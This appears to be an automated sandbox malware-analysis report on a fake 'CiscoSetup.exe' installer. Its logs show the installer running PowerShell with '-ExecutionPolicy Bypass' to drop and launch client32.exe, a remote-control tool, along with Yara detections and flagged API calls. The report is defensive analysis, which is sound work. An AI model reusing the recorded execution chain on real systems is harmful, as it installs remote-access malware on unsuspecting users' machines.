                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: CiscoSetup.exeString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: CiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iminunet.com
                                  Source: CiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iminunet.comPara
                                  Source: is-707KS.tmp.2.dr, is-V7509.tmp.2.drString found in binary or memory: https://www.immunet.com
                                  Source: CiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmp, is-KOKH0.tmp.2.dr, is-KCJJQ.tmp.2.drString found in binary or memory: https://www.immunet.com.
                                  Source: is-KOKH0.tmp.2.drString found in binary or memory: https://www.immunet.com.Um
                                  Source: CiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.immunet.comAby
                                  Source: CiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmp, is-RVLAV.tmp.2.drString found in binary or memory: https://www.immunet.comVoor
                                  Source: CiscoSetup.exe, 00000000.00000003.2131548415.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000000.00000003.2132065973.000000007F29B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000000.2133732042.0000000000C71000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.innosetup.com/
                                  Source: is-VTDA9.tmp.2.drString found in binary or memory: https://www.openssl.org/
                                  Source: CiscoSetup.exe, 00000000.00000003.2131548415.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000000.00000003.2132065973.000000007F29B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000000.2133732042.0000000000C71000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.remobjects.com/ps
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60707
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 60707 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 60703 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60703
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11032930 GetClipboardFormatNameA,SetClipboardData,6_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,9_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11032930 GetClipboardFormatNameA,SetClipboardData,9_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,6_2_11031AC0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,6_2_11007720
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_11110810
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,9_2_11110810
                                  Source: Yara matchFile source: 9.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4176, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 1112, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6484, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-HOMEN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.cat (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva-6.cat (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-BRMT9.tmpJump to dropped file

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Contains functionalty to change the wallpaper
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_11112840
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,9_2_11112840

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: amsi32_3412.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: Process Memory Space: powershell.exe PID: 3412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Powershell drops PE file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess Stats: CPU usage > 49%
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110A9240: DeviceIoControl,6_2_110A9240
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,6_2_1115A340
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102D059 PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D059
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102CEB1 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CEB1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_088237294_2_08823729
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110292306_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110724606_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1115B1806_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1105B3B06_2_1105B3B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1106F2106_2_1106F210
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1107F5206_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1101B9806_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1115F9F06_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1101BDC06_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11163C556_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1108A2606_2_1108A260
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110504306_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110088DB6_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1101CBE06_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11032A606_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11086DA06_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11044C606_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688FA9806_2_688FA980
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689249106_2_68924910
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689239236_2_68923923
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688FDBA06_2_688FDBA0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68923DB86_2_68923DB8
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_6892A0636_2_6892A063
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689241566_2_68924156
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689143C06_2_689143C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F13106_2_688F1310
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689084F06_2_689084F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689245286_2_68924528
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_6891D70F6_2_6891D70F
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F17606_2_688F1760
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1115B1809_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_111131B09_2_111131B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110292309_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1107F5209_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1101B9809_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1115F9F09_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1101BDC09_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11163C559_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110504309_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110724609_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110088DB9_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1101CBE09_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11032A609_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11086DA09_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11044C609_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess token adjusted: SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68919480 appears 61 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68907C70 appears 36 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11142A60 appears 1134 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68907D00 appears 135 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1116B7E0 appears 55 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 6891F3CB appears 33 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 688F6F50 appears 171 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 111434D0 appears 46 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11160790 appears 65 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 688F30A0 appears 54 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11080C50 appears 70 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68907A90 appears 62 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1115CBB3 appears 90 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 110290F0 appears 1982 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1105D340 appears 559 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1109CBD0 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1105D470 appears 55 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11027550 appears 94 times
                                  Source: CiscoSetup.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-VTFF8.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-96AL6.tmp.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: CiscoSetup.tmp.0.drStatic PE information: Number of sections : 11 > 10
                                  Source: is-VTFF8.tmp.2.drStatic PE information: Number of sections : 11 > 10
                                  Source: CiscoSetup.exeStatic PE information: Number of sections : 11 > 10
                                  Source: CiscoSetup.exe, 00000000.00000000.2126103041.0000000000F39000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exe, 00000000.00000003.2132065973.000000007F58B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exe, 00000000.00000003.2131548415.00000000036CF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exeBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: amsi32_3412.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: Process Memory Space: powershell.exe PID: 3412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: is-EUMLH.tmp.2.drBinary string: \Device\VPNVA
                                  Source: classification engineClassification label: mal54.rans.troj.evad.winEXE@10/537@3/3
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11059270 GetLastError,FormatMessageA,LocalFree,6_2_11059270
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,6_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,9_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,9_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,6_2_11095C90
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11088290 FindResourceA,LoadResource,LockResource,6_2_11088290
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\CiscoJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\CiscoJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                                  Source: CiscoSetup.exeString found in binary or memory: /LOADINF="filename"
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeFile read: C:\Users\user\Desktop\CiscoSetup.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\CiscoSetup.exe "C:\Users\user\Desktop\CiscoSetup.exe"
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: sfc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: linkinfo.dllJump to behavior
